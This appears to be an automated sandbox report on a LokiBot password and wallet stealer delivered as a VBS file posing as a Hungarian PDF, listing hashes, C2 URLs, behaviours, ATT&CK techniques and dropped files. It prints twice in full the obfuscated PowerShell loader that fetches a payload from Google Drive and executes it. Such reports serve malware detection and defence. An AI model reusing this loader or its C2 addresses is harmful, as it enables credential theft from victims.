lokibot | 2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815

General

Target

Ajánlatkérés 09-30-2024·pdf.vbs
Size

77KB
MD5

34273527e12e172917598d0e29994432
SHA1

d390fd4b4ffc45be0a7cf05765af19e402377640
SHA256

2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815
SHA512

b9693348f7ddc2564c7a1ce748e58b080c73e57a85ae8f3b673d60106be4c967708c035ca2a820b7470a2be7642592c2db6c14ec9cccd0849eb153f8caebb6f9
SSDEEP

1536:sI0FsAXA4vqGxAx9bBuQPOyk+4OU8vL0yUbVBwXYf:sIcpPAPbB4OFQyIf

Score

10^/10

lokibot collection discovery spyware stealer trojan

Malware Config

Extracted

Family

lokibot

C2

http://137.184.191.215/index.php/10899

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot

Blocklisted process makes network request 11 IoCs

flow	pid	Process
13	4724	powershell.exe
16	4724	powershell.exe
30	3396	msiexec.exe
32	3396	msiexec.exe
34	3396	msiexec.exe
36	3396	msiexec.exe
37	3396	msiexec.exe
48	3396	msiexec.exe
54	3396	msiexec.exe
55	3396	msiexec.exe
63	3396	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
12	drive.google.com
13	drive.google.com
30	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3396	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4664	powershell.exe
3396	msiexec.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4664 set thread context of 3396	4664	powershell.exe	93

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4724	powershell.exe
4724	powershell.exe
4664	powershell.exe
4664	powershell.exe
4664	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4664	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4724	powershell.exe
Token: SeDebugPrivilege	4664	powershell.exe
Token: SeDebugPrivilege	3396	msiexec.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 2984 wrote to memory of 4724	2984	WScript.exe	82
PID 2984 wrote to memory of 4724	2984	WScript.exe	82
PID 4664 wrote to memory of 3396	4664	powershell.exe	93
PID 4664 wrote to memory of 3396	4664	powershell.exe	93
PID 4664 wrote to memory of 3396	4664	powershell.exe	93
PID 4664 wrote to memory of 3396	4664	powershell.exe	93
PID 4664 wrote to memory of 3396	4664	powershell.exe	93

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	msiexec.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	msiexec.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ajánlatkérés 09-30-2024·pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi ');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb 'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb ' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi) Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,) Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir: eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme (atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani :EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg .omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri :TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi ');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb 'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb ' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi) Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,) Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir: eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme (atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani :EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg .omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri :TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4664
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Accesses Microsoft Outlook profiles
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:3396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
95e1c8db6eb5be60fa7c5f7ca36bfaed

SHA1
5b23544fe29ddd6f07852b4ff8971a5bf6c0fdf9

SHA256
3b3202f973ef9c0f477b91a022fd535a21e8b444279d8be34fcd16fccfe68a18

SHA512
de221bd9c8728434d7a463d7bc5123c5bc45362224b8e312abef60e2e89197cd9b77839df07069d663a483233d3395e9cd8b414d68c3b857eb9171d6d8a195db

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aymx1pah.tex.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-786284298-625481688-3210388970-1000\0f5007522459c86e95ffcc62f32308f1_1b74ca46-c49b-4c52-a57d-8cd1ff70c625

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Smaalige.Eks

Filesize
458KB

MD5
743e8aa7e1d11f204b239e36bafc481e

SHA1
a42afad52fda74decb6deb3a12deacfc6f639873

SHA256
9ff25a7ebbcf8054d44fd7a23bd936d6a6b7d44e813301872dcb74bbcf918390

SHA512
66be179d313d849062b7c9c6a5bf20fd8993e34ec2995a4645fb83b3a95ffa676faa066705c48f08a27393117ee4ca0ef46eb4757a363fd5ed500bb24a365580

Download Submit
memory/3396-61-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/4664-42-0x00000000067A0000-0x00000000067BA000-memory.dmp

Filesize
104KB

Download
memory/4664-37-0x0000000005B90000-0x0000000005EE4000-memory.dmp

Filesize
3.3MB

Download
memory/4664-47-0x0000000008C60000-0x000000000C18D000-memory.dmp

Filesize
53.2MB

Download
memory/4664-43-0x00000000074A0000-0x0000000007536000-memory.dmp

Filesize
600KB

Download
memory/4664-45-0x00000000086B0000-0x0000000008C54000-memory.dmp

Filesize
5.6MB

Download
memory/4664-44-0x0000000007430000-0x0000000007452000-memory.dmp

Filesize
136KB

Download
memory/4664-23-0x0000000004C10000-0x0000000004C46000-memory.dmp

Filesize
216KB

Download
memory/4664-24-0x0000000005320000-0x0000000005948000-memory.dmp

Filesize
6.2MB

Download
memory/4664-25-0x00000000052D0000-0x00000000052F2000-memory.dmp

Filesize
136KB

Download
memory/4664-26-0x00000000059C0000-0x0000000005A26000-memory.dmp

Filesize
408KB

Download
memory/4664-27-0x0000000005A30000-0x0000000005A96000-memory.dmp

Filesize
408KB

Download
memory/4664-41-0x0000000007A80000-0x00000000080FA000-memory.dmp

Filesize
6.5MB

Download
memory/4664-40-0x0000000006250000-0x000000000629C000-memory.dmp

Filesize
304KB

Download
memory/4664-39-0x0000000006230000-0x000000000624E000-memory.dmp

Filesize
120KB

Download
memory/4724-15-0x00007FF958943000-0x00007FF958945000-memory.dmp

Filesize
8KB

Download
memory/4724-16-0x00007FF958940000-0x00007FF959401000-memory.dmp

Filesize
10.8MB

Download
memory/4724-0-0x00007FF958943000-0x00007FF958945000-memory.dmp

Filesize
8KB

Download
memory/4724-22-0x00007FF958940000-0x00007FF959401000-memory.dmp

Filesize
10.8MB

Download
memory/4724-21-0x00007FF958940000-0x00007FF959401000-memory.dmp

Filesize
10.8MB

Download
memory/4724-18-0x00007FF958940000-0x00007FF959401000-memory.dmp

Filesize
10.8MB

Download
memory/4724-12-0x00007FF958940000-0x00007FF959401000-memory.dmp

Filesize
10.8MB

Download
memory/4724-17-0x00007FF958940000-0x00007FF959401000-memory.dmp

Filesize
10.8MB

Download
memory/4724-11-0x00007FF958940000-0x00007FF959401000-memory.dmp

Filesize
10.8MB

Download
memory/4724-1-0x000001AAE6A60000-0x000001AAE6A82000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing